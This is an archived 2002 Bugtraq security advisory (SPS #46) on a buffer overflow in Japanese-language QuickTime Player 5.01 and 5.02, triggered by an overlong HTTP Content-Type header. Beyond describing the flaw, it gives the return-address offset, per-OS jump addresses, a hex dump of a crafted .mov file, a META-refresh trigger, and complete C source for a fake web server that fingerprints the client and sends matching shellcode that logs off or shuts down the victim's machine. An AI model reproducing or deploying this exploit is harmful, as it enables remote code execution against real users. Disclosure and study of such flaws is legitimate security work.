Home page logo
/

bugtraq logo Bugtraq mailing list archives

[SPSadvisory#46]Apple QuickTime Player "Content-Type" Buffer Overflow
From: webmaster <webmaster () shadowpenguin org>
Date: Sat, 09 Feb 2002 01:58:17 +0900

SPS Advisory #46

Apple QuickTime Player "Content-Type" Buffer Overflow

UNYUN <unyun () shadowpenguin org>
Shadow Penguin Security (http://www.shadowpenguin.org)

----------------------------------------------------------------------

Date
===================
Feb. 9, 2002

Vulnerable
===================
QuickTime Player 5.01 for Windows (Japanese)
QuickTime Player 5.02 for Windows (Japanese)

Not vulnerable
===================
unknown

Overview
===================
 QuickTime Player can get the file which is published on web server and can play it, 
QuickTime Player overflows when web server sends HTTP response that contains 
long "Content-Type". This buffer overflow overwrites the local buffer, the codes
which are written in "Content-Type" string can be executed on the client host. 

Risk
===================
 If QuickTime Player connects to faked webserver by "Open URL" menu and the web 
server replies "Content-Type" string that contains cracking code, the cracking 
code written in "Content-Type" is executed on the client host. So, this overflow
contains the possibility of the virus and trojans infection, sytsem destruction,
intrusion, and so on. 
 If QuickTime Player opens mov file that contains URL link, QuickTime Player 
tries to get a file which is placed on webserver, so if the faked webserver that
sends cracking code is specified in mov file and QuickTime Player opens it, the
same result described above is caused. This feature can be used to web browser.
If such mov file is hyper-linked on the web page, the cracking code is executed
when visitor clicks it. If the automatic reference such as META tag is written 
in HTML file, the cracking code is executed when visitor opens a web page. This 
problem also affects to the e-mail client that supports HTML mail such as 
Outlook Express.
 Furthermore, QuickTime player sets the version of QuickTime Player and OS 
(including service pack information) to User-Agent. So, faked webserver can send
EIP and egg code which are appropriate for environment of connected client.

Details
===================
QuickTime Player overflows when it connects to the webserver that sends 
following HTTP response.

HTTP/1.1 200 OK
Date: Wed, 06 Feb 2002 06:56:30 GMT
Server: Apache/1.3.19
Last-Modified: Tue, 15 May 2001 13:37:51 GMT
ETag: "1e001d-7b5-3b01312f"
Accept-Ranges: bytes
Content-Length: 1973
Content-Type: aaaaaaaaaaaa.. long string ..aaaaaaaaaaaaa

 You can confirm the buffer overflow if you specify long string (about 500bytes) 
at the line of Content-Type. RET address is stored in offset 456, if the address
of JMP ESP code is specified to RET address, the code written in the buffer for
Content-Type is executed.

 You can create mov file that links to faked webserver as follows. 

exploit.mov 

 ADDRESS   00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F   0123456789ABCDEF 
----------------------------------------------------------------------
 00000000  00 00 00 43 6D 6F 6F 76 00 00 00 3B 6D 64 72 61   ...Cmoov...;mdra 
 00000010  00 00 00 33 64 72 65 66 75 72 6C 20 68 74 74 70   ...3drefurl http 
 00000020  3A 2F 2F 77 77 77 2E 73 68 61 64 6F 77 70 65 6E   ://www.shadowpen 
 00000030  67 75 69 6E 2E 6F 72 67 3A 32 32 32 2F 78 2E 6D   guin.org:222/x.m 
 00000040  6F 76 00                                          ov.            

 If such mov file is referenced by META tag, QuickTime overflows when visitor 
opens the web page. 

<META HTTP-EQUIV="Refresh" CONTENT="0;URL=exploit.mov">

 Furthermore, QuickTime Player sets the version of QuickTime Player and OS to 
User-Agent as follows. 

User-Agent: QuickTime (qtver=5.0.2;os=Windows NT 5.0Service Pack 2)

 Exploit code can send EIP and egg code which are appropriate for environment of 
connected client. 

Avoidance
===================
 If you use Internet Explorer, you can avoid this problem if ActiveX is disabled.
If you open mov file by QuickTime Player, you must check the mov file, check 
whether hyper link is included. If hyper link is specified in mov file, you must
check the "Content-Type" which is sent from webserver.

Caution
===================
 We will change this information without any notice. Use of this information 
constitutes acceptance for use in an AS IS condition. There are NO warranties 
with regard to this information. In no event shall the author be liable for any 
damages whatever arising out of or in connection with the use or spread of this 
information. Any use of this information is only for personal experiment.

Comments ?
===================
 If you have something comments, please send to following address.

 webmaster <webmaster () shadowpenguin org>
 http://www.shadowpenguin.org

Sample code
===================
 This code is faked webserver that sends Content-Type contains sample code.
This code provide TCP service at port 2222. This faked webserver checks User-
Agent which is set by QuickTime Player and sets the appropriate EIP and egg code
(for WindowsXp(home)/2000(pro)/98(SE)). If QuickTime Player connects to this 
faked webserver, all processes are terminated and logged off (In case of 
Window98, shutdown code is executed). This code can be compiled by Visual C++ 6.0.
This sample code was checked under the environment of QuickTime Player5.02/5.
01 for Windows(Japanese), WindowsXp Home(Japanese), Windows2000 Professional SP2
(Japanese), and Windows98 Second Edition (Japanese). 

/*======================================================================
   Apple QuickTimePlayer 5.02/5.01 Exploit
     for Windows XP Home edition 
         Windows2000 Professional (Service Pack 2)
         Windows98 Second Edition
   The Shadow Penguin Security (http://www.shadowpenguin.org)
   Written by UNYUN (unyun () shadowpenguin org)
  =======================================================================
*/
#include <windows.h>
#include <windowsx.h>
#include <stdio.h>
#include <winsock.h>

#define SERVICE_PORT    2222
#define MAXBUF          4096
#define TGTBUFSIZE      500
#define NOP             0x90
#define RETOFS          456
#define CODEOFS         470
#define RETADR_2000pro  0x77e0af64
#define RETADR_XPhome   0x77e4fb71
#define RETADR_98SE     0xbfb92995

#define UA_2000PRO      "Windows NT 5.0Service Pack 2"
#define UA_XPHOME       "Windows NT 5.1"
#define UA_98SE         "Windows 98 A "

#define ANSWER \
"HTTP/1.1 200 OK\r\n"\
"Date: Wed, 06 Feb 2002 06:56:30 GMT\r\n"\
"Server: Apache/1.3.19\r\n"\
"Last-Modified: Tue, 15 May 2001 13:37:51 GMT\r\n"\
"ETag: \"1e001d-7b5-3b01312f\"\r\n"\
"Accept-Ranges: bytes\r\n"\
"Content-Length: 1973\r\n"\
"Content-Type: %s\r\n\r\n"

static unsigned char egg_2000pro[512]={
  0xB8,0xA5,0xFA,0xE1,0x77,0x33,0xDB,0xB3,
  0x04,0x53,0x53,0xFF,0xD0,0x90,0xEB,0xFD
};
static unsigned char egg_XPhome[512]={
  0xB8,0xe3,0x02,0xd4,0x77,0x33,0xDB,0xB3,
  0x04,0x53,0x53,0xFF,0xD0,0x90,0xEB,0xFD
};
static unsigned char egg_98se[512]={
  0xB8,0x2c,0x23,0xf5,0xbf,0x33,0xDB,0xB3,
  0x05,0x53,0x53,0xFF,0xD0,0x90,0xEB,0xFD
};

int main(int argc,char *argv[])
{
    WSADATA         wsa;
    SOCKADDR_IN     sAddr,clientAddr;
    SOCKET          sock_listen,sock;
    int             nClientAddrLen=sizeof(clientAddr);
    static char     packetbuf[MAXBUF*2];
    static char     buf[MAXBUF],recvbuf[MAXBUF];
    int             r;
    unsigned int    eip;
    char            *p,*q,*qtver,*os;
    unsigned char   *egg;

    // Create socket and wait connection
    WSAStartup(MAKEWORD(2,0),&wsa);
    sock_listen=socket(AF_INET,SOCK_STREAM,0);
    sAddr.sin_family        = AF_INET;
    sAddr.sin_addr.s_addr   = htonl(INADDR_ANY);
    sAddr.sin_port          = htons((u_short)(SERVICE_PORT));
    bind(sock_listen,(SOCKADDR *)&sAddr,sizeof(sAddr)); 
    listen(sock_listen,1);
    printf("Waiting connection (Port %d)...\n",SERVICE_PORT);
    sock=accept(sock_listen,(LPSOCKADDR)&clientAddr,&nClientAddrLen);
    printf("Accepted [from %s].\n",inet_ntoa(clientAddr.sin_addr));

    // Recv request
    if ((r=recv(sock,recvbuf,sizeof(recvbuf)-1,0))==SOCKET_ERROR){
        printf("Can not recv packet\n");
        return(0);
    }
    recvbuf[r]='\0';
    printf("---request------------------------------\n");
    printf("%s\n",recvbuf);
    printf("----------------------------------------\n");
    if ((p=strstr(recvbuf,"User-Agent:"))==NULL){
        printf("Can not select\n");
        printf("%s\n",recvbuf);
        exit(1);
    }
    if ((q=strchr(p,'\r'))!=NULL) *q='\0';
    if ((qtver=strstr(p,"qtver="))==NULL){
        printf("Version is not written in User-Agent\n");
        printf("%s\n",p);
        exit(1);
    }
    qtver+=6;
    if ((q=strchr(qtver,';'))!=NULL) *q='\0';
    printf("Client version = '%s'\n",qtver);
    q++;
    if ((p=strchr(q,')'))!=NULL) *p='\0';
    if ((os=strstr(q,"os="))==NULL){
        printf("OS name is not written in User-Agent\n");
        printf("%s\n",q);
        exit(1);
    }
    os+=3;
    printf("Client OS = '%s'\n",os);

    if (!strcmp(os,UA_XPHOME)){
        eip=RETADR_XPhome;
        egg=egg_XPhome;
        printf("Target = WindowsXp Home\n");
    }else if (!strcmp(os,UA_2000PRO)){
        eip=RETADR_2000pro;
        egg=egg_2000pro;
        printf("Target = Windows2000 Professional (SP2)\n");
    }else if (!strcmp(os,UA_98SE)){
        eip=RETADR_98SE;
        egg=egg_98se;
        printf("Target = Windows98 Second Edition\n");
    }else{
        eip=RETADR_2000pro;
        egg=egg_2000pro;
        printf("Target = Unknown.\n");
    }
    
    // Make exploit
    memset(buf,NOP,sizeof(buf));
    buf[RETOFS  ]=eip&0xff;
    buf[RETOFS+1]=(eip>>8)&0xff;
    buf[RETOFS+2]=(eip>>16)&0xff;
    buf[RETOFS+3]=(eip>>24)&0xff;
    strncpy(buf+CODEOFS,egg,strlen(egg));
    buf[TGTBUFSIZE]='\0';
    
    // Send exploit
    sprintf(packetbuf,ANSWER,buf);
    if (send(sock,packetbuf,strlen(packetbuf),0)==SOCKET_ERROR){
        printf("Can not send packet\n");
        return(0);
    }

    Sleep(1000);
    closesocket(sock);
    printf("Done\n");
    return(0);
}
-----
** Announcement **
The Shadow Penguin Security was moved from http://shadowpenguin.backsection.net
to http://www.shadowpenguin.org.

-----
The Shadow Penguin Security [ http://www.shadowpenguin.org ]
webmaster () shadowpenguin org


  By Date           By Thread  

Current thread:
  • [SPSadvisory#46]Apple QuickTime Player "Content-Type" Buffer Overflow webmaster (Feb 08)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]